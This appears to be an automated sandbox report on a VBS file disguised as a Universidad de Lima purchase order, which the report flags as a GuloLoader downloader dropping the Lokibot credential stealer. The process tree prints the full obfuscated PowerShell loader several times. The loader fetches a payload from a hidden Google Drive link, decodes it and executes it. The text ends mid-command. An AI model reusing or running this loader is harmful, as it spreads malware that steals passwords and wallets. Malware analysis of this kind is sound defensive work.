Overview

overview

10

Static

static

1

SOLICITUD ...24.vbs

windows7-x64

10

SOLICITUD ...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 20:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SOLICITUD DE PEDIDO (Universidad de Lima) 09-19-2024.vbs

  • Size

    31KB

  • MD5

    47cac20c8fc2ca2e5afa529c6e8e4723

  • SHA1

    ae8d6dc81dbe5484588327a1eec7b8ad72eee45e

  • SHA256

    e2f64ec66f68feb67c5510ff5f17c82bd171354dec19e4fe4e5f601199c45efa

  • SHA512

    dfa1416cb737c6a99fc18faa0c577a23cbb16f9daafccf9ce02802e6b5b3c2968a2fc2bc749b6c349dc2580d7ddd2178738b009f4ff4756767e573200acc522d

  • SSDEEP

    384:Z9vOg3Cn+eBDvj1vTV0UA8Ja5cFzhKDty5iAT2WsWKOxZ1dmv/FIWMpeJK:Zp3CVDvY5Uf2pOMFIT1

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderexecutionspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE PEDIDO (Universidad de Lima) 09-19-2024.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Trappeafsatsen Behaviorismens Programmr Scandalously Distrustfulness Slopingly #>;$Karussers175='Forekomsternes30';<#Stjerneforme Raticidal Afterwale Inburning Srgeflor #>;$Bestaaedes=$host.PrivateData;If ($Bestaaedes) {$Stomates++;}function carene($Fodindlggenes){$Microcosmal=$Fodindlggenes.Length-$Stomates;for( $systyle=5;$systyle -lt $Microcosmal;$systyle+=6){$Preunderstanding+=$Fodindlggenes[$systyle];}$Preunderstanding;}function Gabeller($Termitbo){ . ($Riveres) ($Termitbo);}$Skidendes=carene 'HimmeMMuscaoAab.nzunsociUnctul rivalIdiosanonh /Fervo5 ond.Magni0White Pens(Hy ocWForariOfttinFormad punioSk amwBawdrsPr.cu SygeNKirkeTFac l Slutk1 Belg0Ellio.Reinf0Hydra;Super Ha maWUniariIn.ivnIntu 6Skyd 4Faktu;Skrue Udenrx Tele6 Allo4Nudum;o.erp AcylralkalvStemm:atara1Roman2Prol,1 Trem.Unive0Balan)B,toi ReklGLi eteRadiocOctavkCommuoZabis/ek.po2 ,cum0Skylo1 Er g0 Fla.0Forha1Str.p0Formo1Stryg FelicF TrolibaandrSp oneHu ryfFaldeoS,ippx Mars/Infil1Fight2 Pup 1Ingro. Reco0Despa ';$Guldvaerdi111=carene 'lan,gUprdiksShuntEMokkeR Disk-G ngaaFemaaGFredeEPy.idn ijactVink. ';$Relends=carene 'San,vhAfbaltSoccetHukomp Unmaspalae:Rvfu,/Seats/VendedSe iarHalveiPrjsevS,riee Pus . darbgAnakooUlu.io mphigAgterlRemudeUrgam.Viviac Un roSociamP lea/S.yliuSandfc Nona?OsriceRet.rx delupGenskoSubjerPl iatBrumm=HjskoddemodoTeismwMitign ricalDetesoT.knia ,icidFejlr&Capibi,erindFore.=.istr1S.gniHDema,AMyttevArter4Revi 7DambrZ ragmV MeshdTe st4Segga0 BabyRPortrg Mis h LokaBProt.bVi.di9ForetYTrit DDegas2TenemOP pirkM gthh Cycl7Rinnaa ValgxStyrtaCapilHRaba eWad eS PrenRTrachLSpatat Stab ';$Efterstrbelsernes=carene ' onsi>Saver ';$Riveres=carene 'Amor ienkleEHyperx Dybd ';$Kalamazoo193='Endhand';$Fisketurene = carene 'Mes reGlatfc Storh Protoreent Fang%CrackaSsonspPep.ipGaribdWolf aToadstDramaaEmi.s% oerc\FestrNGl.ndyE urih Sch aRenfrv Hannn Ogdo1 Tall. SpryWNot tiH stelperia Dmper&Bet k&Dynel AmbaseSporoctast h isbo lek AdelitCobo ';Gabeller (carene 'Unenc$EvelygDiaphlNaveroopt.abSvampaMen.rl Reci: TukaREndoli PrinnEksklgT line.revesUformtpe,aleS xfisM,squ=Suabl(HomoscPapbamgodkedUnta Modem/ UndecFolds anv $ arkF Pa oiKnighspatenk nterelittet Ha auHenser O,ereV.rtinStenseFetic)Night ');Gabeller (carene 'Egena$ Se sg DokblClassoUsynlbSignaa Sertl stor:SamkrSBlomspOpsami B nedHjsp,sFroscgNonpuaDecuptMacultZerdae ActirBev sesunbunJillssUn im1Dros 5Telef9Skral=Amour$rebu RTibioePsyk,l Galde arfrnStemmd PtassTi li.Artsfs ,hamp nitalStakliPrygltpelsd(Herea$ arbeEDaubefWestet MismeDemi rNonadsKrykktManufrSubpabAnthreNonaclhulwos B.rteD.pherMandsn Prope SevrsE for)Utmme ');Gabeller (carene ' Gr.n[Ra psNDif,eeOmta tDrac .UnwebSKino,eDa,nyrDirknvScr ti pre,cAbonneFortiPUforso Upswi nrednBlodst,ndroMSprrea aakonSemioaKonkag RespeStaklr.ourb]Sagsg:Opvkk:IndesS Saroebagerc iddauLeptorGemaki,iagutBegroySee.kPSp ngrMakssoVacantCalvioHist c karooScenalTidst uncru= hrys Essay[UrosiNfo ude Creet ,ank. ,nstSOutd.e in ec S,gtuVan krStan i onektLe ony HankPCry trperiooEpi etlfteroCza ocWellcoFrivalretroTSanityEsc opModfaeQuagm] T ne:Trkga: MomeTG,emmlDisils bstr1udebl2 Forn ');$Relends=$Spidsgatterens159[0];$Brandtaler= (carene 'P.rae$SyzygG edlelRocheOa denBByreta,ereglRidie: RevaFOrt,oAUnpa.tKsemaT MediI,tilegBilabkBenz v RealA oonirPu.seTCl.psEPolymrPhaneE Uhenr lutbNUnpreE Scin=O livnP apre lektwSa.ac-DentsoFlammB Is lj VestETidsrcAngelTCur a F arnSUniveyFlelssBryd TTel seDe onM N nm.Soo inTi treGoldatGrand.PraelW H.stE bar.BKont,cOpb.el P imIFrettELysskNfeatsT');$Brandtaler+=$Ringestes[1];Gabeller ($Brandtaler);Gabeller (carene ' Ukam$AfnazF Fo vaBicortYacatt olymiOpremgCoccykCrudevD amya OpvurSkredtStu teAy.rcrOver eI dinrEnvirn Sv,neEkstr.Mo alHCicateTaareaUpreadTrykkeSelenrKonsusGager[Ar,mi$CiderGTiltnu KairlEndledCul uv I.swaTrocheSecerr,oreadSoliciTam e1Ledsa1Overt1Defus]Penni=Sperm$N,wscS ModikkompoiVarmedAmyg.eS astn u sadOve peFr tesMegal ');$Jamesian=carene 'Brb.r$Zech.FAa.dsa HemitMealgt HilsiFodbogho,edkU.attv PotlaForb.rKejset ncise ,alarMigrae SubdrBefs.nSympheRed i.IncruDMammooLkke.w Sl enUn.xtl MetaoOverra S.rid InspFAya uiLegitlProtoe auro( vill$ ChylROchideEjendlS onie Fordn Hyped K lvsFlywi,Gaffe$ Ir eSOrcheuSloshbWin as Batit roduiPetrelDecere Domp)Traad ';$Substile=$Ringestes[0];Gabeller (carene 'K tte$CatheG Het,lDyewoOImproB Letva,uturlOr,re:TvillHN croIU fomTSamleTMentoe BemjnKrakiDI chie ,kedS Sprt= Ophr(FlipiT troheCrutcSAmusit Su s-Sto.vPGaranAIngemTBesseHNond, Gluci$Besvrs BlueUHjdenbBulbls BactTcraftI HideLNeedlEPlapr)Dreje ');while (!$Hittendes) {Gabeller (carene 'Furis$ Ure gTranglSnobboSnedkb DotaaRadiolPrepa: temG DeweiEla de ModttUvigto nderv C.rl=Gens,$RefratLangbrRekaluI,tere nhng ') ;Gabeller $Jamesian;Gabeller (carene 'DeputSCl,met Pe,ba AllorCupfutgalio-correSFoelel MooreClepeeAre mpMerid Best4Ant.c ');Gabeller (carene 'Vidvi$ F lkgPotholEks.ooConstb Stema Taktl alli:PuppeHPreaaiExesct SnustComm e For nso iod ImprePettes Civi=T rmo(TearpT Skeme TilrsInflat Reto-Paat PNonpoa EndotDobelhe.ois Dles$Reed.SSkrifu P.ovbFlades Con.tPoly,iBeskalborgeeor.er)Micki ') ;Gabeller (carene ' Udga$ ordig hodal S,oro SkarbShoplaArti lCodeb:VableS Gravi Maerg A gonFla la Bassl AntiiVolucfLatoor Stat=Toaar$H mmeg.huswl DecioMu ikbRetraaSpinel Bakk:,ilicK Tse vOpprolBesrgs Jin tTjeneoTandsfGenr.fMicroeMyxopt .msa+ para+Krimi%Forge$KvantS oerepValndi SupedTro lsA ruigJugosaAf krt ietetLava eNatatrPens.eUnbr n A,tisSt mm1Dimen5 Skin9 Unsu. UdskcNeuroo iskeu igsonPro,rt ges ') ;$Relends=$Spidsgatterens159[$Signalifr];}$Besudlingens=292929;$Friturekogendes=27795;Gabeller (carene 'Dgnry$WallmgBolstlBoro oFas.nb Polaa verflYems.:Che sFSp ogrAsminoJupatsErhvet Se.ibPa,afiBeredrUngdodOvers T,per=Recep KolonGKajareEdbs,t Inte-HomozC Nat op osenFladetFornueNybygnHermetSkalo Ciste$Insu SPar.iuInstrbBumbls absttTransiVarialWoodseFri,o ');Gabeller (carene 'senge$Hacklg lealBorshoOzon,bFellaaMed clchori:perfeCDei.ieForanrE sneu C sttBioges Po.a ve,et=M,tal Water[,epacS fganyBes ns SountMugngeCarabm Anno.VejkaCRwan,o ApianDiscivForeseKet,hrMacrotBehag],kade: F,rm: uckmFDe isr QuavoGannymLudosBHopliaS.vadsOronaeEyv,n6Liste4 HjreSAllottB,sttr rsoniH,jttnor hogFermo(Skros$N.graFPrec rTortio ,onfsFugtftRlighbRnkefi InharSpiradBesta) fter ');Gabeller (carene 'Coinc$CardogErythlIstidoSwin.bGodkea envilAn if:SottiFB cillGenfoofulleoProf e Fo,ry Inta Hyper=Beskf Noner[BlundSPresey,onadsP oxitElm eeD minmBlotl. OrdkTLumineoksefxa ouctAppar.MilieEFabl nSe vmcJerbooFluordRho aiLovrenBrnergBanko]grsen:S.cia: TogbAJobsgShjrneC .upeIMoralIchopi.RemouG injee CenttChimeSUnmoutBaandrNoviciWin en ecengInton(.reve$ O igCSlumre.viber.udieuCir utTestssSil,e) dnv ');Gabeller (carene 'Bo rd$AppetgAfterlIns.foMytilbUntwiaT neml Wino:Ndr sT Skrih Duo uUnstasnietznFrigreAfladl Unded SavvaRenvasD ste=Cookn$ErythFInnovlGreinoBoldboIlluveF.rneyBulle. ,inds ivesu ranbLsengs NbestMona rFireli Heren rolagS.vni(Kris $OverhBBestneSeksts Hospu,ygosd.rapplBistaiDomesn RinggBla.keNdrinnSubsts Laqu,Ly ke$ CystFBesynrunvoliFreebturteku Skrar RenteEkvi kDekl o Re tg Pe oelide n PoppdAmat e,rnsesLinje)Adopt ');Gabeller $Thusneldas;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3816
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nyhavn1.Wil && echo t"
        3⤵
          PID:4408
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Trappeafsatsen Behaviorismens Programmr Scandalously Distrustfulness Slopingly #>;$Karussers175='Forekomsternes30';<#Stjerneforme Raticidal Afterwale Inburning Srgeflor #>;$Bestaaedes=$host.PrivateData;If ($Bestaaedes) {$Stomates++;}function carene($Fodindlggenes){$Microcosmal=$Fodindlggenes.Length-$Stomates;for( $systyle=5;$systyle -lt $Microcosmal;$systyle+=6){$Preunderstanding+=$Fodindlggenes[$systyle];}$Preunderstanding;}function Gabeller($Termitbo){ . ($Riveres) ($Termitbo);}$Skidendes=carene 'HimmeMMuscaoAab.nzunsociUnctul rivalIdiosanonh /Fervo5 ond.Magni0White Pens(Hy ocWForariOfttinFormad punioSk amwBawdrsPr.cu SygeNKirkeTFac l Slutk1 Belg0Ellio.Reinf0Hydra;Super Ha maWUniariIn.ivnIntu 6Skyd 4Faktu;Skrue Udenrx Tele6 Allo4Nudum;o.erp AcylralkalvStemm:atara1Roman2Prol,1 Trem.Unive0Balan)B,toi ReklGLi eteRadiocOctavkCommuoZabis/ek.po2 ,cum0Skylo1 Er g0 Fla.0Forha1Str.p0Formo1Stryg FelicF TrolibaandrSp oneHu ryfFaldeoS,ippx Mars/Infil1Fight2 Pup 1Ingro. Reco0Despa ';$Guldvaerdi111=carene 'lan,gUprdiksShuntEMokkeR Disk-G ngaaFemaaGFredeEPy.idn ijactVink. ';$Relends=carene 'San,vhAfbaltSoccetHukomp Unmaspalae:Rvfu,/Seats/VendedSe iarHalveiPrjsevS,riee Pus . darbgAnakooUlu.io mphigAgterlRemudeUrgam.Viviac Un roSociamP lea/S.yliuSandfc Nona?OsriceRet.rx delupGenskoSubjerPl iatBrumm=HjskoddemodoTeismwMitign ricalDetesoT.knia ,icidFejlr&Capibi,erindFore.=.istr1S.gniHDema,AMyttevArter4Revi 7DambrZ ragmV MeshdTe st4Segga0 BabyRPortrg Mis h LokaBProt.bVi.di9ForetYTrit DDegas2TenemOP pirkM gthh Cycl7Rinnaa ValgxStyrtaCapilHRaba eWad eS PrenRTrachLSpatat Stab ';$Efterstrbelsernes=carene ' onsi>Saver ';$Riveres=carene 'Amor ienkleEHyperx Dybd ';$Kalamazoo193='Endhand';$Fisketurene = carene 'Mes reGlatfc Storh Protoreent Fang%CrackaSsonspPep.ipGaribdWolf aToadstDramaaEmi.s% oerc\FestrNGl.ndyE urih Sch aRenfrv Hannn Ogdo1 Tall. SpryWNot tiH stelperia Dmper&Bet k&Dynel AmbaseSporoctast h isbo lek AdelitCobo ';Gabeller (carene 'Unenc$EvelygDiaphlNaveroopt.abSvampaMen.rl Reci: TukaREndoli PrinnEksklgT line.revesUformtpe,aleS xfisM,squ=Suabl(HomoscPapbamgodkedUnta Modem/ UndecFolds anv $ arkF Pa oiKnighspatenk nterelittet Ha auHenser O,ereV.rtinStenseFetic)Night ');Gabeller (carene 'Egena$ Se sg DokblClassoUsynlbSignaa Sertl stor:SamkrSBlomspOpsami B nedHjsp,sFroscgNonpuaDecuptMacultZerdae ActirBev sesunbunJillssUn im1Dros 5Telef9Skral=Amour$rebu RTibioePsyk,l Galde arfrnStemmd PtassTi li.Artsfs ,hamp nitalStakliPrygltpelsd(Herea$ arbeEDaubefWestet MismeDemi rNonadsKrykktManufrSubpabAnthreNonaclhulwos B.rteD.pherMandsn Prope SevrsE for)Utmme ');Gabeller (carene ' Gr.n[Ra psNDif,eeOmta tDrac .UnwebSKino,eDa,nyrDirknvScr ti pre,cAbonneFortiPUforso Upswi nrednBlodst,ndroMSprrea aakonSemioaKonkag RespeStaklr.ourb]Sagsg:Opvkk:IndesS Saroebagerc iddauLeptorGemaki,iagutBegroySee.kPSp ngrMakssoVacantCalvioHist c karooScenalTidst uncru= hrys Essay[UrosiNfo ude Creet ,ank. ,nstSOutd.e in ec S,gtuVan krStan i onektLe ony HankPCry trperiooEpi etlfteroCza ocWellcoFrivalretroTSanityEsc opModfaeQuagm] T ne:Trkga: MomeTG,emmlDisils bstr1udebl2 Forn ');$Relends=$Spidsgatterens159[0];$Brandtaler= (carene 'P.rae$SyzygG edlelRocheOa denBByreta,ereglRidie: RevaFOrt,oAUnpa.tKsemaT MediI,tilegBilabkBenz v RealA oonirPu.seTCl.psEPolymrPhaneE Uhenr lutbNUnpreE Scin=O livnP apre lektwSa.ac-DentsoFlammB Is lj VestETidsrcAngelTCur a F arnSUniveyFlelssBryd TTel seDe onM N nm.Soo inTi treGoldatGrand.PraelW H.stE bar.BKont,cOpb.el P imIFrettELysskNfeatsT');$Brandtaler+=$Ringestes[1];Gabeller ($Brandtaler);Gabeller (carene ' Ukam$AfnazF Fo vaBicortYacatt olymiOpremgCoccykCrudevD amya OpvurSkredtStu teAy.rcrOver eI dinrEnvirn Sv,neEkstr.Mo alHCicateTaareaUpreadTrykkeSelenrKonsusGager[Ar,mi$CiderGTiltnu KairlEndledCul uv I.swaTrocheSecerr,oreadSoliciTam e1Ledsa1Overt1Defus]Penni=Sperm$N,wscS ModikkompoiVarmedAmyg.eS astn u sadOve peFr tesMegal ');$Jamesian=carene 'Brb.r$Zech.FAa.dsa HemitMealgt HilsiFodbogho,edkU.attv PotlaForb.rKejset ncise ,alarMigrae SubdrBefs.nSympheRed i.IncruDMammooLkke.w Sl enUn.xtl MetaoOverra S.rid InspFAya uiLegitlProtoe auro( vill$ ChylROchideEjendlS onie Fordn Hyped K lvsFlywi,Gaffe$ Ir eSOrcheuSloshbWin as Batit roduiPetrelDecere Domp)Traad ';$Substile=$Ringestes[0];Gabeller (carene 'K tte$CatheG Het,lDyewoOImproB Letva,uturlOr,re:TvillHN croIU fomTSamleTMentoe BemjnKrakiDI chie ,kedS Sprt= Ophr(FlipiT troheCrutcSAmusit Su s-Sto.vPGaranAIngemTBesseHNond, Gluci$Besvrs BlueUHjdenbBulbls BactTcraftI HideLNeedlEPlapr)Dreje ');while (!$Hittendes) {Gabeller (carene 'Furis$ Ure gTranglSnobboSnedkb DotaaRadiolPrepa: temG DeweiEla de ModttUvigto nderv C.rl=Gens,$RefratLangbrRekaluI,tere nhng ') ;Gabeller $Jamesian;Gabeller (carene 'DeputSCl,met Pe,ba AllorCupfutgalio-correSFoelel MooreClepeeAre mpMerid Best4Ant.c ');Gabeller (carene 'Vidvi$ F lkgPotholEks.ooConstb Stema Taktl alli:PuppeHPreaaiExesct SnustComm e For nso iod ImprePettes Civi=T rmo(TearpT Skeme TilrsInflat Reto-Paat PNonpoa EndotDobelhe.ois Dles$Reed.SSkrifu P.ovbFlades Con.tPoly,iBeskalborgeeor.er)Micki ') ;Gabeller (carene ' Udga$ ordig hodal S,oro SkarbShoplaArti lCodeb:VableS Gravi Maerg A gonFla la Bassl AntiiVolucfLatoor Stat=Toaar$H mmeg.huswl DecioMu ikbRetraaSpinel Bakk:,ilicK Tse vOpprolBesrgs Jin tTjeneoTandsfGenr.fMicroeMyxopt .msa+ para+Krimi%Forge$KvantS oerepValndi SupedTro lsA ruigJugosaAf krt ietetLava eNatatrPens.eUnbr n A,tisSt mm1Dimen5 Skin9 Unsu. UdskcNeuroo iskeu igsonPro,rt ges ') ;$Relends=$Spidsgatterens159[$Signalifr];}$Besudlingens=292929;$Friturekogendes=27795;Gabeller (carene 'Dgnry$WallmgBolstlBoro oFas.nb Polaa verflYems.:Che sFSp ogrAsminoJupatsErhvet Se.ibPa,afiBeredrUngdodOvers T,per=Recep KolonGKajareEdbs,t Inte-HomozC Nat op osenFladetFornueNybygnHermetSkalo Ciste$Insu SPar.iuInstrbBumbls absttTransiVarialWoodseFri,o ');Gabeller (carene 'senge$Hacklg lealBorshoOzon,bFellaaMed clchori:perfeCDei.ieForanrE sneu C sttBioges Po.a ve,et=M,tal Water[,epacS fganyBes ns SountMugngeCarabm Anno.VejkaCRwan,o ApianDiscivForeseKet,hrMacrotBehag],kade: F,rm: uckmFDe isr QuavoGannymLudosBHopliaS.vadsOronaeEyv,n6Liste4 HjreSAllottB,sttr rsoniH,jttnor hogFermo(Skros$N.graFPrec rTortio ,onfsFugtftRlighbRnkefi InharSpiradBesta) fter ');Gabeller (carene 'Coinc$CardogErythlIstidoSwin.bGodkea envilAn if:SottiFB cillGenfoofulleoProf e Fo,ry Inta Hyper=Beskf Noner[BlundSPresey,onadsP oxitElm eeD minmBlotl. OrdkTLumineoksefxa ouctAppar.MilieEFabl nSe vmcJerbooFluordRho aiLovrenBrnergBanko]grsen:S.cia: TogbAJobsgShjrneC .upeIMoralIchopi.RemouG injee CenttChimeSUnmoutBaandrNoviciWin en ecengInton(.reve$ O igCSlumre.viber.udieuCir utTestssSil,e) dnv ');Gabeller (carene 'Bo rd$AppetgAfterlIns.foMytilbUntwiaT neml Wino:Ndr sT Skrih Duo uUnstasnietznFrigreAfladl Unded SavvaRenvasD ste=Cookn$ErythFInnovlGreinoBoldboIlluveF.rneyBulle. ,inds ivesu ranbLsengs NbestMona rFireli Heren rolagS.vni(Kris $OverhBBestneSeksts Hospu,ygosd.rapplBistaiDomesn RinggBla.keNdrinnSubsts Laqu,Ly ke$ CystFBesynrunvoliFreebturteku Skrar RenteEkvi kDekl o Re tg Pe oelide n PoppdAmat e,rnsesLinje)Adopt ');Gabeller $Thusneldas;"
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1172
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Trappeafsatsen Behaviorismens Programmr Scandalously Distrustfulness Slopingly #>;$Karussers175='Forekomsternes30';<#Stjerneforme Raticidal Afterwale Inburning Srgeflor #>;$Bestaaedes=$host.PrivateData;If ($Bestaaedes) {$Stomates++;}function carene($Fodindlggenes){$Microcosmal=$Fodindlggenes.Length-$Stomates;for( $systyle=5;$systyle -lt $Microcosmal;$systyle+=6){$Preunderstanding+=$Fodindlggenes[$systyle];}$Preunderstanding;}function Gabeller($Termitbo){ . ($Riveres) ($Termitbo);}$Skidendes=carene 'HimmeMMuscaoAab.nzunsociUnctul rivalIdiosanonh /Fervo5 ond.Magni0White Pens(Hy ocWForariOfttinFormad punioSk amwBawdrsPr.cu SygeNKirkeTFac l Slutk1 Belg0Ellio.Reinf0Hydra;Super Ha maWUniariIn.ivnIntu 6Skyd 4Faktu;Skrue Udenrx Tele6 Allo4Nudum;o.erp AcylralkalvStemm:atara1Roman2Prol,1 Trem.Unive0Balan)B,toi ReklGLi eteRadiocOctavkCommuoZabis/ek.po2 ,cum0Skylo1 Er g0 Fla.0Forha1Str.p0Formo1Stryg FelicF TrolibaandrSp oneHu ryfFaldeoS,ippx Mars/Infil1Fight2 Pup 1Ingro. Reco0Despa ';$Guldvaerdi111=carene 'lan,gUprdiksShuntEMokkeR Disk-G ngaaFemaaGFredeEPy.idn ijactVink. ';$Relends=carene 'San,vhAfbaltSoccetHukomp Unmaspalae:Rvfu,/Seats/VendedSe iarHalveiPrjsevS,riee Pus . darbgAnakooUlu.io mphigAgterlRemudeUrgam.Viviac Un roSociamP lea/S.yliuSandfc Nona?OsriceRet.rx delupGenskoSubjerPl iatBrumm=HjskoddemodoTeismwMitign ricalDetesoT.knia ,icidFejlr&Capibi,erindFore.=.istr1S.gniHDema,AMyttevArter4Revi 7DambrZ ragmV MeshdTe st4Segga0 BabyRPortrg Mis h LokaBProt.bVi.di9ForetYTrit DDegas2TenemOP pirkM gthh Cycl7Rinnaa ValgxStyrtaCapilHRaba eWad eS PrenRTrachLSpatat Stab ';$Efterstrbelsernes=carene ' onsi>Saver ';$Riveres=carene 'Amor ienkleEHyperx Dybd ';$Kalamazoo193='Endhand';$Fisketurene = carene 'Mes reGlatfc Storh Protoreent Fang%CrackaSsonspPep.ipGaribdWolf aToadstDramaaEmi.s% oerc\FestrNGl.ndyE urih Sch aRenfrv Hannn Ogdo1 Tall. SpryWNot tiH stelperia Dmper&Bet k&Dynel AmbaseSporoctast h isbo lek AdelitCobo ';Gabeller (carene 'Unenc$EvelygDiaphlNaveroopt.abSvampaMen.rl Reci: TukaREndoli PrinnEksklgT line.revesUformtpe,aleS xfisM,squ=Suabl(HomoscPapbamgodkedUnta Modem/ UndecFolds anv $ arkF Pa oiKnighspatenk nterelittet Ha auHenser O,ereV.rtinStenseFetic)Night ');Gabeller (carene 'Egena$ Se sg DokblClassoUsynlbSignaa Sertl stor:SamkrSBlomspOpsami B nedHjsp,sFroscgNonpuaDecuptMacultZerdae ActirBev sesunbunJillssUn im1Dros 5Telef9Skral=Amour$rebu RTibioePsyk,l Galde arfrnStemmd PtassTi li.Artsfs ,hamp nitalStakliPrygltpelsd(Herea$ arbeEDaubefWestet MismeDemi rNonadsKrykktManufrSubpabAnthreNonaclhulwos B.rteD.pherMandsn Prope SevrsE for)Utmme ');Gabeller (carene ' Gr.n[Ra psNDif,eeOmta tDrac .UnwebSKino,eDa,nyrDirknvScr ti pre,cAbonneFortiPUforso Upswi nrednBlodst,ndroMSprrea aakonSemioaKonkag RespeStaklr.ourb]Sagsg:Opvkk:IndesS Saroebagerc iddauLeptorGemaki,iagutBegroySee.kPSp ngrMakssoVacantCalvioHist c karooScenalTidst uncru= hrys Essay[UrosiNfo ude Creet ,ank. ,nstSOutd.e in ec S,gtuVan krStan i onektLe ony HankPCry trperiooEpi etlfteroCza ocWellcoFrivalretroTSanityEsc opModfaeQuagm] T ne:Trkga: MomeTG,emmlDisils bstr1udebl2 Forn ');$Relends=$Spidsgatterens159[0];$Brandtaler= (carene 'P.rae$SyzygG edlelRocheOa denBByreta,ereglRidie: RevaFOrt,oAUnpa.tKsemaT MediI,tilegBilabkBenz v RealA oonirPu.seTCl.psEPolymrPhaneE Uhenr lutbNUnpreE Scin=O livnP apre lektwSa.ac-DentsoFlammB Is lj VestETidsrcAngelTCur a F arnSUniveyFlelssBryd TTel seDe onM N nm.Soo inTi treGoldatGrand.PraelW H.stE bar.BKont,cOpb.el P imIFrettELysskNfeatsT');$Brandtaler+=$Ringestes[1];Gabeller ($Brandtaler);Gabeller (carene ' Ukam$AfnazF Fo vaBicortYacatt olymiOpremgCoccykCrudevD amya OpvurSkredtStu teAy.rcrOver eI dinrEnvirn Sv,neEkstr.Mo alHCicateTaareaUpreadTrykkeSelenrKonsusGager[Ar,mi$CiderGTiltnu KairlEndledCul uv I.swaTrocheSecerr,oreadSoliciTam e1Ledsa1Overt1Defus]Penni=Sperm$N,wscS ModikkompoiVarmedAmyg.eS astn u sadOve peFr tesMegal ');$Jamesian=carene 'Brb.r$Zech.FAa.dsa HemitMealgt HilsiFodbogho,edkU.attv PotlaForb.rKejset ncise ,alarMigrae SubdrBefs.nSympheRed i.IncruDMammooLkke.w Sl enUn.xtl MetaoOverra S.rid InspFAya uiLegitlProtoe auro( vill$ ChylROchideEjendlS onie Fordn Hyped K lvsFlywi,Gaffe$ Ir eSOrcheuSloshbWin as Batit roduiPetrelDecere Domp)Traad ';$Substile=$Ringestes[0];Gabeller (carene 'K tte$CatheG Het,lDyewoOImproB Letva,uturlOr,re:TvillHN croIU fomTSamleTMentoe BemjnKrakiDI chie ,kedS Sprt= Ophr(FlipiT troheCrutcSAmusit Su s-Sto.vPGaranAIngemTBesseHNond, Gluci$Besvrs BlueUHjdenbBulbls BactTcraftI HideLNeedlEPlapr)Dreje ');while (!$Hittendes) {Gabeller (carene 'Furis$ Ure gTranglSnobboSnedkb DotaaRadiolPrepa: temG DeweiEla de ModttUvigto nderv C.rl=Gens,$RefratLangbrRekaluI,tere nhng ') ;Gabeller $Jamesian;Gabeller (carene 'DeputSCl,met Pe,ba AllorCupfutgalio-correSFoelel MooreClepeeAre mpMerid Best4Ant.c ');Gabeller (carene 'Vidvi$ F lkgPotholEks.ooConstb Stema Taktl alli:PuppeHPreaaiExesct SnustComm e For nso iod ImprePettes Civi=T rmo(TearpT Skeme TilrsInflat Reto-Paat PNonpoa EndotDobelhe.ois Dles$Reed.SSkrifu P.ovbFlades Con.tPoly,iBeskalborgeeor.er)Micki ') ;Gabeller (carene ' Udga$ ordig hodal S,oro SkarbShoplaArti lCodeb:VableS Gravi Maerg A gonFla la Bassl AntiiVolucfLatoor Stat=Toaar$H mmeg.huswl DecioMu ikbRetraaSpinel Bakk:,ilicK Tse vOpprolBesrgs Jin tTjeneoTandsfGenr.fMicroeMyxopt .msa+ para+Krimi%Forge$KvantS oerepValndi SupedTro lsA ruigJugosaAf krt ietetLava eNatatrPens.eUnbr n A,tisSt mm1Dimen5 Skin9 Unsu. UdskcNeuroo iskeu igsonPro,rt ges ') ;$Relends=$Spidsgatterens159[$Signalifr];}$Besudlingens=292929;$Friturekogendes=27795;Gabeller (carene 'Dgnry$WallmgBolstlBoro oFas.nb Polaa verflYems.:Che sFSp ogrAsminoJupatsErhvet Se.ibPa,afiBeredrUngdodOvers T,per=Recep 